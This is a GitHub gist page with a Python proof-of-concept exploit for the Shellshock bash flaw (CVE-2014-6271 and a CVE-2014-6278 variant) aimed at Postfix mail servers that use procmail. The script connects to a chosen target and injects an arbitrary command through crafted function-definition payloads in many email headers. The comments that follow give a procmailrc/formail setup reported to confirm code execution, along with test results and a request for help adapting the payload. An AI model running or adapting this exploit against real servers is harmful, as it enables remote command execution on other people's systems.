Last active
August 7, 2021 11:45
-
-
Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
Postfix Shellshock PoC Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python | |
| # Exploit Title: Shellshock SMTP Exploit | |
| # Date: 10/3/2014 | |
| # Exploit Author: fattymcwopr | |
| # Vendor Homepage: gnu.org | |
| # Software Link: http://ftp.gnu.org/gnu/bash/ | |
| # Version: 4.2.x < 4.2.48 | |
| # Tested on: Debian 7 (postfix smtp server w/procmail) | |
| # CVE : 2014-6271 | |
| from socket import * | |
| import sys | |
| def usage(): | |
| print "shellshock_smtp.py <target> <command>" | |
| argc = len(sys.argv) | |
| if(argc < 3 or argc > 3): | |
| usage() | |
| sys.exit(0) | |
| rport = 25 | |
| rhost = sys.argv[1] | |
| cmd = sys.argv[2] | |
| headers = ([ | |
| "To", | |
| "References", | |
| "Cc", | |
| "Bcc", | |
| "From", | |
| "Subject", | |
| "Date", | |
| "Message-ID", | |
| "Comments", | |
| "Keywords", | |
| "Resent-Date", | |
| "Resent-From", | |
| "Resent-Sender" | |
| ]) | |
| s = socket(AF_INET, SOCK_STREAM) | |
| s.connect((rhost, rport)) | |
| # banner grab | |
| s.recv(2048*4) | |
| def netFormat(d): | |
| d += "\n" | |
| return d.encode('hex').decode('hex') | |
| data = netFormat("mail from:<>") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("rcpt to:<root@localhost>") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("data") | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = '' | |
| for h in headers: | |
| # Original | |
| data += netFormat(h + ":() { :; };" + cmd) | |
| # Variant 1 - CVE-2014-6271 | |
| #data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ") | |
| # Variant 2 - CVE-2014-6278 | |
| #data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :") | |
| data += netFormat(cmd) | |
| # <CR><LF>.<CR><LF> | |
| data += "0d0a2e0d0a".decode('hex') | |
| s.send(data) | |
| s.recv(2048*4) | |
| data = netFormat("quit") | |
| s.send(data) | |
| s.recv(2048*4) |
Ok, finally got this working...
If a user is using a .procmailrc and using formail to export specific header attributes from the email, it's possible for an attacker to obtain code execution via the email headers set in the original PoC assuming the target address is modified to that of a valid user.
Here's a viable example I used to verify code execution in a Postfix + Procmail + Formail combination...
VERBOSE=yes
PATH=/bin:/usr/bin:/usr/local/bin
SHELL=/bin/bash
MAILDIR=$HOME/mail
PMDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc
SHELL=/bin/sh
SUBJECT=`formail -xSubject:`
FROM=`formail -rt -xTo:`
:0:
* ^Subject:.*
| (formail)
Hi, very good post.
The format I'm trying exploit is slightly different.
Can you explain how to generate the payload according to the format?
# Original
data += netFormat(h + ":() { :; };" + cmd)
# Variant 1 - CVE-2014-6271
#data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
# Variant 2 - CVE-2014-6278
#data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Just tested on the following, still no code exec, but I can confirm that my .procmailrc is processing the email fully and foldering it on a non-root user.
Bash = 4.1.2(1)
Postfix = 2.6.6
Procmail = 3.22
I also experimented with allowing postfix to have a default shell of /bin/bash
RESULT: the above test seems like it should work, but no code execution.
Also tested with a formail config...
RESULT: appears to process the mail fine, logs show formail execution, still not code execution of user supplied bash PoC headers.